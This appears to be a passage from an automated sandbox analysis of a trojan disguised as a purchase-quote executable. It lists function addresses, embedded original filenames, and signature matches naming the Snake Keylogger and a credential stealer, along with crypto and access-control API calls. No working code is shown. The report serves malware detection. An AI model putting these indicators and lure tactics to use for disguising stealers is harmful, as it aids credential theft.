Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1CA08	9_2_00C1CA08
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1CCD8	9_2_00C1CCD8
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C13E09	9_2_00C13E09
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C16FC8	9_2_00C16FC8
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1CFAB	9_2_00C1CFAB
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1F961	9_2_00C1F961
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1E97B	9_2_00C1E97B
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CE7D0	9_2_065CE7D0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C1FA8	9_2_065C1FA8
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C9448	9_2_065C9448
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C9D38	9_2_065C9D38
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C2A90	9_2_065C2A90
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C1850	9_2_065C1850
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C5148	9_2_065C5148
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CD670	9_2_065CD670
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C9668	9_2_065C9668
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CD660	9_2_065CD660
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CDF1F	9_2_065CDF1F
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CDF20	9_2_065CDF20
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CE7CF	9_2_065CE7CF
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C1F9C	9_2_065C1F9C
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CEC18	9_2_065CEC18
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CEC28	9_2_065CEC28
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CF4D8	9_2_065CF4D8
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C8CC0	9_2_065C8CC0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CCDC0	9_2_065CCDC0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CD218	9_2_065CD218
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CDAC8	9_2_065CDAC8
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CE378	9_2_065CE378
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CE36A	9_2_065CE36A
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C0B30	9_2_065C0B30
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C0B20	9_2_065C0B20
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C0040	9_2_065C0040
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C1841	9_2_065C1841
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CF071	9_2_065CF071
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C0006	9_2_065C0006
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CF080	9_2_065CF080
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065C5138	9_2_065C5138
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CF930	9_2_065CF930
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_065CF922	9_2_065CF922
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_0153DA5C	10_2_0153DA5C
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_031E0130	10_2_031E0130
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_031E0120	10_2_031E0120
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_031EF598	10_2_031EF598
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_031EF587	10_2_031EF587
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_0569E678	10_2_0569E678
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_0569C692	10_2_0569C692
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05690560	10_2_05690560
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05690550	10_2_05690550
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_056997E8	10_2_056997E8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05699128	10_2_05699128
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05699117	10_2_05699117
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05694078	10_2_05694078
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05690269	10_2_05690269
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05690278	10_2_05690278
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05696FF8	10_2_05696FF8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05698800	10_2_05698800
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 10_2_05696BC0	10_2_05696BC0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544C468	14_2_0544C468
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544C738	14_2_0544C738
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544C146	14_2_0544C146
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_05447118	14_2_05447118
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544A088	14_2_0544A088
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_05445370	14_2_05445370
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544D278	14_2_0544D278
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544CCD8	14_2_0544CCD8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544CFA9	14_2_0544CFA9
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544E988	14_2_0544E988
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_054469A0	14_2_054469A0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544CA08	14_2_0544CA08
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_05443E09	14_2_05443E09
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544F961	14_2_0544F961
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_0544E97A	14_2_0544E97A
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_054429EC	14_2_054429EC
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_05443A39	14_2_05443A39
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC2A90	14_2_06DC2A90
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC9668	14_2_06DC9668
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC1FA8	14_2_06DC1FA8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCF4D8	14_2_06DCF4D8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC1850	14_2_06DC1850
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC9D90	14_2_06DC9D90
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC5148	14_2_06DC5148
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCDAC8	14_2_06DCDAC8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCDAB9	14_2_06DCDAB9
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCD670	14_2_06DCD670
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCD660	14_2_06DCD660
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCD218	14_2_06DCD218
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCE7D0	14_2_06DCE7D0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCE7CF	14_2_06DCE7CF
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC1FA1	14_2_06DC1FA1
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCE378	14_2_06DCE378
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCE369	14_2_06DCE369
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCDF1F	14_2_06DCDF1F
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC0B30	14_2_06DC0B30
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCDF20	14_2_06DCDF20
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC0B20	14_2_06DC0B20
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC8CC0	14_2_06DC8CC0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCF080	14_2_06DCF080
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC8CB1	14_2_06DC8CB1
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC9448	14_2_06DC9448
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC0040	14_2_06DC0040
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC1841	14_2_06DC1841
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCF071	14_2_06DCF071
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCEC18	14_2_06DCEC18
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC0007	14_2_06DC0007
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCEC28	14_2_06DCEC28
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCCDC0	14_2_06DCCDC0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC5143	14_2_06DC5143
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCF930	14_2_06DCF930
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DC9D29	14_2_06DC9D29
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 14_2_06DCF921	14_2_06DCF921

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: invalid certificate

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1606022545.0000000005AC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowe vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000000.1556844407.000000000071A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejkcw.exeH vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1607054546.0000000007200000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1605891572.00000000054C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.000000000435F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1599728924.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1601618602.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2798598293.00000000007A7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Binary or memory string: OriginalFilenamejkcw.exeH vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nDEusQ.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, -i-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, -i-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, fkQPIScgjIfgwhQwC4.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, fkQPIScgjIfgwhQwC4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, fkQPIScgjIfgwhQwC4.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, fkQPIScgjIfgwhQwC4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
